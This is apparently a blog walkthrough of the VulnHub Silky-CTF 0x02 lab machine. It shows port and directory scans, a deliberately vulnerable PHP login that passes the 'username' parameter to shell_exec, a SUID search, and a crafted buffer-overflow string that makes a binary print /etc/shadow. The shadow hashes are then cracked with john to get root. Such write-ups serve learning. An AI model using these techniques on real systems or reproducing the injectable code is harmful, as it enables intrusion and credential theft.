you can download it here: https://www.vulnhub.com/entry/silky-ctf-0x02,307/

use nmap to do a thorough port scanning.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
root@kali:~# nmap -p 1-65535 -T4 -v -A 192.168.227.161
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 11:50 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Initiating ARP Ping Scan at 11:50
Scanning 192.168.227.161 [1 port]
Completed ARP Ping Scan at 11:50, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:50
Completed Parallel DNS resolution of 1 host. at 11:50, 0.15s elapsed
Initiating SYN Stealth Scan at 11:50
Scanning 192.168.227.161 [65535 ports]
Discovered open port 80/tcp on 192.168.227.161
Discovered open port 22/tcp on 192.168.227.161
Completed SYN Stealth Scan at 11:50, 2.28s elapsed (65535 total ports)
Initiating Service scan at 11:50
Scanning 2 services on 192.168.227.161
Completed Service scan at 11:50, 6.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.161
NSE: Script scanning 192.168.227.161.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.24s elapsed
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Nmap scan report for 192.168.227.161
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 eb:74:50:5c:6f:57:04:15:bd:8c:57:ff:eb:a2:9f:58 (RSA)
| 256 97:50:40:64:05:4e:57:44:7d:31:a7:60:84:0a:9d:5c (ECDSA)
|_ 256 fe:6e:fa:67:54:96:a7:bd:54:45:10:30:1c:20:c3:61 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:FB:F0:E8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.226 days (since Sun Jun 9 06:25:50 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 192.168.227.161

NSE: Script Post-scanning.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

check the http service(port 80)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~# dirb http://192.168.227.161

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Jun 9 11:52:15 2019
URL_BASE: http://192.168.227.161/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.227.161/ ----
+ http://192.168.227.161/admin.php (CODE:200|SIZE:3702)
+ http://192.168.227.161/index.html (CODE:200|SIZE:10701)
+ http://192.168.227.161/server-status (CODE:403|SIZE:303)

-----------------
END_TIME: Sun Jun 9 11:52:18 2019
DOWNLOADED: 4612 - FOUND: 3

1

tried sql injection, tried brute forcing, all failed.

stucked here for very long time and still no clues.

google the walkthrough and found that there is a command execution in parameter ‘username’…

how ridiculous? how is it even possible that username will be executed in an login page?

2

1
2
3
4
5
6
7
<?php
if(isset($_GET["username"])){
echo shell_exec($_GET["username"]);
if($_GET["username"] != "Admin" && $_GET["password"] != "ufoundmypasswordlolbutidontthinkso")
echo "Falscher Nutzernamen oder falsches Passwort";
}
?>

how is this code even possible in real life scenario? well, it is just a game, so…

anyway, get a reverse shell.

look for suid file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
find / -user root -perm -4000 -print 2>/dev/null

/bin/mount
/bin/su
/bin/fusermount
/bin/umount
/bin/ping
/bin/ntfs-3g
/home/silky/cat_shadow
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device

/home/silky/cat_shadow this seems to be quite interesting, take a look

3

seems to be a buffer overflow challenge. generate payload here: https://wiremask.eu/tools/buffer-overflow-pattern-generator/

1
2
3
4
5
6
www-data@Silky-CTF0x02:/home/silky$ ./cat_shadow Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Trying to cat /etc/shadow
Permisson denied!
0x63413163 != 0x496c5962

0x63413163 convert to cA1c, so search for c1Ac(reverse cA1c since little endian in x86)

5

so the chars in front of c1Ac is used to fill up the buffer and the excess will overflow and will be compared to 0x496c5962(converted to IlYb)

so the final payload would be:

1
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0AbYlI
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
www-data@Silky-CTF0x02:/home/silky$ ..//ccaatt__sshhaaddooww  Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab<5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0AbYlI

Trying to read /etc/shadow
Succes
Printing...
root:$6$L69RL59x$ONQl06MP37LfjyFBGlQ5TYtdDqEZEe0yIZIuTHASQG/dgH3Te0fJII/Wtdbu0PA3D/RTxJURc.Ses60j0GFyF/:18012:0:99999:7:::
daemon:*:18012:0:99999:7:::
bin:*:18012:0:99999:7:::
sys:*:18012:0:99999:7:::
sync:*:18012:0:99999:7:::
games:*:18012:0:99999:7:::
man:*:18012:0:99999:7:::
lp:*:18012:0:99999:7:::
mail:*:18012:0:99999:7:::
news:*:18012:0:99999:7:::
uucp:*:18012:0:99999:7:::
proxy:*:18012:0:99999:7:::
www-data:*:18012:0:99999:7:::
backup:*:18012:0:99999:7:::
list:*:18012:0:99999:7:::
irc:*:18012:0:99999:7:::
gnats:*:18012:0:99999:7:::
nobody:*:18012:0:99999:7:::
systemd-timesync:*:18012:0:99999:7:::
systemd-network:*:18012:0:99999:7:::
systemd-resolve:*:18012:0:99999:7:::
systemd-bus-proxy:*:18012:0:99999:7:::
_apt:*:18012:0:99999:7:::
dnsmasq:*:18012:0:99999:7:::
avahi-autoipd:*:18012:0:99999:7:::
messagebus:*:18012:0:99999:7:::
usbmux:*:18012:0:99999:7:::
geoclue:*:18012:0:99999:7:::
speech-dispatcher:!:18012:0:99999:7:::
rtkit:*:18012:0:99999:7:::
pulse:*:18012:0:99999:7:::
avahi:*:18012:0:99999:7:::
colord:*:18012:0:99999:7:::
saned:*:18012:0:99999:7:::
Debian-gdm:*:18012:0:99999:7:::
hplip:*:18012:0:99999:7:::
silky:$6$F0T5vQMg$BKnwGPZ17UHvqZLOVFVCUh6CrsZ5Eu8BLT1/uX3h44wtEoDt9qA2dYL04CMUXHw2Km9H.tttNiyaCHwQQ..2T0:18012:0:99999:7:::
mysql:!:18012:0:99999:7:::
sshd:*:18012:0:99999:7:::

ok, now I have the hash for silky and root, it’s john time, bruteforce the hash against top 100000 passwords and get the answer:

6

login with root:greygrey and get the root shell

7